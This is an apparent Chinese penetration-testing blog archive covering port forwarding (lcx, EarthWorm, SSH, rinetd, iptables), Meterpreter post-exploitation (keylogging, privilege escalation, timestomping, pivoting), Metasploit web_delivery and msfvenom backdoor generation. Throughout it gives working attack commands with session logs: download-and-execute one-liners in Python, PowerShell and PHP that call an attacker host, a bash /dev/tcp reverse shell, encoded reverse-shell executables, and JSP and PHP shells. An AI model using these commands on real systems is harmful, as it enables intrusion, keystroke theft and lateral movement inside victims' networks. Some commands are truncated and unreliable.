标签归档:meterpreter

端口转发工具梳理

在日常的渗透中,通常在获得一台机器的权限后,如果想访问该机器所在内网的某机器端口,最常用的就是端口转发,比如可以将3389转发到公网的VPS上。下面是不同平台下常用的工具。

Windows


1)lcx
公网VPS:
lcx -listen 2222 3333
2222为转发端口,3333为本机任意未被占用的端口

测试机:
lcx -slave x.x.x.x 2222 127.0.0.1 3389

2)EarthWorm
公网VPS:
ew_for_Win.exe -s lcx_listen -l 10800 -e 8080

测试机:
E:\>ew_for_Win.exe -s lcx_slave -d 192.168.190.201 -e 8080 -f 192.168.192.144 -g 22

Linux


1)SSH隧道
本地端口转发
ssh -qTfnN -L port:host:hostport user@remote_ip #正向隧道,监听本地port
参数详解:

-q Quiet mode. 安静模式
-T Disable pseudo-tty allocation. 不占用 shell 了
-f Requests ssh to go to background just before command execution. 后台运行,并推荐加上 -n 参数
-N Do not execute a remote command. 不执行远程命令,端口转发就用它了~

假定host1是本地主机,host2是远程主机。由于种种原因,这两台主机之间无法连通。但是,另外还有一台host3,可以同时连通前面两台主机。
我们在host1执行下面的命令:

[vincent@vincent rinetd]$ ssh -qTfnN -L 2345:192.168.192.120:22 root@172.16.100.167

其中:
host2 IP:192.168.192.120
host3 IP:172.16.100.167
命令中的L参数一共接受三个值,分别是”本地端口:目标主机:目标主机端口”,它们之间用冒号分隔。
然后看下host1的监听:

[vincent@vincent rinetd]$ netstat -ano | grep 2345
tcp 0 0 127.0.0.1:2345 0.0.0.0:* LISTEN off (0.00/0/0)

然后连接本地的2345端口即可访问host2的SSH

远程端口转发
ssh -qTfnN -R port:host:hostport user@remote_ip #反向隧道,用于内网穿透防火墙限制之类
host1 IP:192.168.192.120
host2 IP:172.16.100.167
host1与host2之间无法连通,必须借助host3转发。但是,如果host3是一台内网机器,它可以连接外网的host1,但是反过来就不行,外网的host1连不上内网的host3。
我们在host3执行下面的命令:

ssh -qTfnN -R 2345:172.16.100.167:22 root@192.168.192.120

其中2345为host1的监听端口,22为host2的转发端口。
然后我们看host1的监听端口:

[root@server120 rinetd]# netstat -ano | grep 2345
tcp 0 0 127.0.0.1:2345 0.0.0.0:* LISTEN off (0.00/0/0)

此时我们通过ssh连接本地的2345端口即可访问host2的ssh。
看一下host3的进程:

[root@vincent rinetd]# ps axu | grep ssh | grep 2345
root 80061 0.0 0.1 62296 1288 ? Ss 12:58 0:00 ssh -qTfnN -R 2345:172.16.100.167:22 root@192.168.192.120

对应的连接:

[root@vincent rinetd]# netstat -anlp | grep 80061
tcp 0 0 172.16.100.134:58166 192.168.192.120:22 ESTABLISHED 80061/ssh

2)EarthWorm
公网VPS:

./ew -s lcx_listen -l 10800 -e 888

测试机:

./ew_for_linux64 -s lcx_slave -d 198.98.112.112 -e 888 -f 192.168.192.144 -g 8888

3)meterpreter

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20
[*] Local TCP relay created: 172.16.0.20:2323 <-> 7.7.7.20:80

4)rinetd

wget http://www.boutell.com/rinetd/http/rinetd.tar.gz
tar -zxvf rinetd.tar.gz

[root@vincent rinetd]# make
cc -DLINUX -g -c -o rinetd.o rinetd.c
rinetd.c:176: 警告:与内建函数‘log’类型冲突
cc -DLINUX -g -c -o match.o match.c
gcc rinetd.o match.o -o rinetd

[root@vincent rinetd]# make install
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8
install: 无法创建普通文件"/usr/man/man8": 没有那个文件或目录
make: *** [install] 错误 1

运行make可能会出现错误,需如下修改,将rinetd.c文件中bindPort >= 65536和connectPort >= 65536修改为65535,不然在make的时候会提示超出系统最大定义端口。
手动建目录/usr/man/

[root@vincent rinetd]# make install
install -m 700 rinetd /usr/sbin
install -m 644 rinetd.8 /usr/man/man8

建立配置文件/etc/rinetd.conf,内容格式:源IP 源端口 要跳转的IP 要跳转的端口。我们来添加一条

allow 192.168.190.201 #设置允许连接的IP
0.0.0.0 2222 192.168.192.122 3389
[root@vincent rinetd]# ./rinetd -c /etc/rinetd.conf

看一下本地监听端口

[root@vincent rinetd]# netstat -ano | grep 2222
tcp 0 0 0.0.0.0:2222 0.0.0.0:* LISTEN off (0.00/0/0)

然后我们使用192.168.190.201连接本机的2222端口,就可以登录192.168.192.122远程桌面

5)Iptables
需要有Root权限
首先启用网卡转发功能

[root@linux-node1 ~]# vim /etc/sysctl.conf
..........
net.ipv4.ip_forward = 1

PREROUTING是目的地址转换,要把别人的公网IP换成你们内部的IP,才让访问到你们内部受防火墙保护的机器。
POSTROUTING是源地址转换,要把你的内网地址转换成公网地址才能让你上网。
源地址发送数据–> {PREROUTING–>路由规则–>POSTROUTING} –>目的地址接收到数据

这里将访问192.168.192.120 1080 转到 192.168.192.144 22端口

iptables -t nat -A PREROUTING -p tcp -m tcp --dport 1080 -j DNAT --to-destination 192.168.192.144:22 
iptables -t nat -A POSTROUTING -d 192.168.192.144 -p tcp -m tcp --dport 22 -j SNAT --to-source 192.168.192.120

 

[root@server120 source]# iptables -t nat -L -vn
Chain PREROUTING (policy ACCEPT 505 packets, 93775 bytes)
pkts bytes target prot opt in out source destination 
1 52 DNAT tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:1080 to:192.168.192.144:22

Chain POSTROUTING (policy ACCEPT 31 packets, 1739 bytes)
pkts bytes target prot opt in out source destination 
1 52 SNAT tcp -- * * 0.0.0.0/0 192.168.192.144 tcp dpt:22 to:192.168.192.120

Chain OUTPUT (policy ACCEPT 31 packets, 1739 bytes)
pkts bytes target prot opt in out source destination

 

清空配置

iptables -t nat -F

 

端口转发的应用案例:

公网的VPS上没有msf的话,我们可以利用ssh隧道的端口转发功能,来使用本地的msf。
首先修改VPS的配置
编辑 /etc/ssh/sshd_config
在文件最后添加:
GatewayPorts yes
GatewayPorts是否允许远程主机连接本地的转发端口.默认值是”no”.
sshd 默认将远程端口转发绑定到loopback地址.这样将阻止其它远程主机连接到转发端口。
GatewayPorts 指令可以让 sshd 将远程端口转发绑定到非loopback地址,这样就可以允许远程主机连接了。

首先在本地执行

ssh -qTfnN -R 2345:172.16.100.128:2345 root@172.16.100.134

转发本地的2345端口到172.16.100.134的2345端口。
来查看一下172.16.100.134的连接

[root@vincent rinetd]# netstat -anlp | grep 2345
tcp 0 0 0.0.0.0:2345 0.0.0.0:* LISTEN 83417/sshd

发现2345端口是监听在0.0.0.0的,而如果没有GatewayPorts no的话则是监听在127.0.0.1的,仅允许本地连接。
然后我们生成一个后门

root@kali-vincent:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.134 LPORT=2345 -f exe -o abc.exe

然后我们在windows上运行一下这个后门,就可以直接在本地获取到meterpreter。

 

meterpreter命令详解

基本命令:
background # 让meterpreter处于后台模式
sessions -i number # 与会话进行交互,number表示第n个session
quit # 退出会话
shell # 获得命令行

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

 

cat c:\\boot.ini # 查看文件内容
getwd # 查看当前工作目录 work directory
upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上
download 0xfa.txt /root/Desktop/ # 下载文件到本机上
edit c:\\boot.ini # 编辑文件
search -d d:\\www -f web.config # search 文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数为pid的进程中

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
getsystem #提权操作
timestompc:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间

键盘记录:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

端口转发:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

然后查看本地监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

内网渗透pivot:

是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境。
在Windows2003虚拟机上新建一块网卡,然后选择主机模式,配置不同网段10.11.100.1,kali是访问不了这个网段的。

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

或者可以在meterpreter中直接添加路由

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

这时候就可以使用其他的模块对内网进行渗透了,但是如果想要其他的应用可以访问到内网,这里使用auxiliary/server/socks4a模块,需要注意Proxychains不支持ICMP,所以在代理使用NMAP的时候需要使用 -sT -Pn参数。

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

然后看一下端口监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
添加socks4 127.0.0.1 1080

然后使用proxychains nmap -sS -v 10.11.100.1就可以对内网进行扫描了

Metasploit Web Delivery

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671

Metasploit Framework msfvenom

msfvenom命令行选项如下:

Options:

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload,可以用“>”号代替 
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/linux/osx/android和不同的编程语言python/php等。
root@kali:~# msfvenom -l payloads

查看支持编码
root@kali:~# msfvenom -l encoders
如果你使用了-b选项(设定了规避字符集),会自动调用编码器。
其他情况下,你需要使用-e选项来使用编码模块,例如:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
也可以使用-i选项进行多次编码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

下面演示一些用法:
Kali:172.16.100.182
测试机:172.16.100.155

PHP利用msfvenom生成后门


查看下php相关payload

msfvenom -l payloads | grep php

这里我们用bind_php来测试

php/bind_php Listen for a connection and spawn a command shell via php

查看配置项

root@kali:~# msfvenom -p php/bind_php --payload-options

生成后门

msfvenom -p php/bind_php RHOST=172.16.100.155 R

去掉开头的/*
访问http://172.16.100.155/1.php查看监听

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

 

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

 

升级为Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

JAVA利用msfvenom生成后门


查看下可以使用的payload

msfvenom -l payloads | grep java

这里我们使用

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

访问后获取反弹shell

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Windows利用msfvenom生成后门


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

本地监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Windows生成powershell后门


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

然后Windows下运行powershell -file “test.ps1”

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

参考文章
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm